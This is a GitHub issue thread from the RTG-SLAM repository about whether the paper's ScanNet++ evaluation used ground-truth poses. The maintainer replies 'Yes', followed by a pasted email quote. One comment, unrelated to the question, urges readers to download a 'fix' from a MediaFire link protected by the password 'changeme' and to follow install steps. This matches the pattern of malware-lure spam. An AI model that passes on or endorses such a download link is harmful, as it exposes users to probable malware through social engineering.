### ISSUE TITLE
Wrong config  on Scannetpp dataset?

### ISSUE THREAD

**Issue by lif314** [MisEty/RTG-SLAM#41]
Thank you for your great work! According to the config on scannetpp, `gt_pose` is set to True ([here]( https://github.com/MisEty/RTG-SLAM/blob/main/configs/scannetpp_base.yaml#L28)), and the ORB backend is not used. Does the performance evaluation of scannetpp in the paper adopt this setting?

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MisEty** [comment]
Yes-------- 原始邮件 --------发件人： cogitoErgoSum ***@***.***>日期： 2024年8月27日周二 11:22收件人： MisEty/RTG-SLAM ***@***.***>抄送： Subscribed ***@***.***>主    题： [MisEty/RTG-SLAM] Wrong config  on Scannetpp dataset? (Issue #41)
Thank you for your great work! According to the config on scannetpp, gt_pose is set to True (here), and the ORB backend is not used. Does the performance evaluation of scannetpp in the paper adopt this setting?
